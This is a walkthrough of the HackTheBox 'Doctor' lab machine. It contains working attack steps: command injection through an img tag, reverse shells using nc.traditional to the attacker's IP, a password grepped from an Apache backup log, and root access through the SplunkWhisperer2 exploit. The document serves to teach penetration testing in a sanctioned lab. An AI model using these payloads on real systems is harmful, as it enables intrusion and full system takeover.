Doctor HackTheBox WalkThrough
This is Doctor HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Doctor HTB
machine. Before starting let us know something about this machine. It is a Linux
box with IP address 10.10.10.209
and difficulty level easy
assigned by it’s maker.
First of all connect your PC with VPN
and confirm the connectivity with doctor machine by pinging the IP 10.10.10.209. If all goes correct then start hacking. As usual, I started by scanning the box. Nmap
(a port scanner) gave the following result:-
Scanning
$ nmap -sC -sV -oN doctor 10.10.10.209
Nmap revealed port 22, 80 and 8089 are open. OpenSSH
on port 22
, Apache2
web server on port 80
and Splunkd
server on port 8089
are running. Since apache2 web server is running so there must be some website hosted on this server. The website can be accessed by the URL http://10.10.10.209:80 or simply http://10.10.10.209/. After going to this URL find a website that appears as below
Tried to check the page source
by pressing CTRL+U
, for the CMS
(if any) from which this website is made but, could not found. If there would be some CMS as if WordPress I would use wpscan
(WordPress vulnerability scanner) because these scanners are specially made for WordPress websites so they will enumerate a lot more than what we do manually. Since we do not have any CMS, therefore we have to enumerate manually.
After some initial enumeration got an email address [email protected]
at the URL http://10.10.10.209/. This email contains a domain name doctors.htb
so added this domain to my hosts file which is present in directory /etc/
. In case if there will be some virtual hosting
enabled we would get some other website.
Host File after Modification
$ cat /etc/hosts
Ongoing to URL http://doctors.htb directed to a login page
of URL http://doctors.htb/login?next=%2F
Since I do not have any login credential so clicked on Register
to create an account with the following credential.
Username: dkm
Email: [email protected]
Password: password
Confirm Password: password
If you are getting signup or login problem then use incognito mode in Firefox browser.
Now after signup, logged in with the following credential
Email: [email protected]
Password: password
We are inside the home
folder. Clicked on New Message
to write some message. After trying some basic XSS
and SQLi
payloads found a way by which I could communicate with my local machine through this website. Alternatively, we can say, I got a connection from doctor machine to my local machine. To test this, started a netcat listener
to listen on port 80
on my kali machine. Then inserted an <img>
tag with my tun0 IP in src and clicked on Post
to post the content to the web server.
<img src=http://10.10.14.15/anything)>
Although got an error denoting a non-valid link
but the link did its work as you can see in above screenshot. After spending, some more time on this page got a way by which we can execute code on doctor machine.
Checking RCE
To test RCE, we have to start python web server on our local machine and look carefully to the REQUESTS
, which is made to this server from the website. To confirm the RCE
type the code
<img src=http://10.10.14.15/$(id)>
in Content
box and after posting the script you will get a REQUEST on your web server and it will also contain the uid
of the user who is running the command (here web). From this, we can confirm Remote Code Execution
on doctor machine.
You can get a remote shell on this machine in multiple ways. I just tried to execute shell command using nc.traditional backdoor
, which is present on doctor
machine and got shell. One thing I want to clear that I did not know previously that doctor machine actually has nc.traditional
installed. Recently, on almost every HTB boxes I found netcat
software previously installed that is why I just checked it, in hope to get present there, and it does.
Getting User Shell
To get remote shell started netcat listener to listen on port 2345
and Posted
the following code in the Content section of the website.
$ nc –nvlp 2345
#On your terminal
And below code on Content Section of the doctor website
<img src=http://10.10.14.15/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.15'$IFS'2345')>
The variable $IFS
is called Internal Field Separator
in shell script whose default value is space.
We got a shell. Let us upgrade the shell to a fully qualified Linux shell so that we can run advanced Linux command, which requires fully qualified Linux shell.
Upgrading Shell
~which python3
//Checking if python3 is installed or not on the doctor machine
~python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
There are two users namely web
and shaun
in /home/
directory of doctor. Tried, to switch the user to shuan
but it requires password and until now, we do not have any credentials. So ran linpeas.sh
[a post exploitation enumeration script] to check whether we can find any credentials or privilege escalation vector. Linpeas.sh found a password Guitar123
inside the backup
file of apache2
folder. The file is present at the directory /var/log/apache2/
We can grep
the password from the backup
file using the following command
$ grep -i pass /var/log/apache2/backup
We have a password Guitar123
but do not know whose credential it is. Tried to use this credential for user shaun
and could successfully switched to shaun.
$ su shaun
~Guitar123
Capture User Flag
$ cat /home/shaun/user.txt
Privilege Escalation
Finding PrivEsc Vector
Linpeas.sh
also suspected on splunk
for privilege escalation
. So immediately I googled privilege escalation using splunk
and got these two suitable articles on very first page this and this.
After following the steps as directed, I could escalate the privilege very easily. So here, our privilege escalation vector is PrivEsc
through Splunk Universal Forwarder Hijacking
. For more info about this read this article.
To escalate the privilege I did the following things.
1. Started netcat listener in one window
$ nc -nvlp 1234
2. Cloned the repository in my PC
$ git clone https://github.com/cnotin/SplunkWhisperer2.git
3. Change the directory to the exploit folder
$ cd SplunkWhisperer2/PySplunkWhisperer2
4. Run the exploit using the following command
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.15 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh 10.10.14.15 1234'
$ nc -nvlp 1234
Got a root shell. Let’s capture the root flag.
Capture Root Flag
~cat /root/root.txt
This is how I rooted to Doctor HackTheBox. Learnt a lot after hunting this machine. Hope you guys have also learnt some new things from this machine writeup. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to write us at [email protected].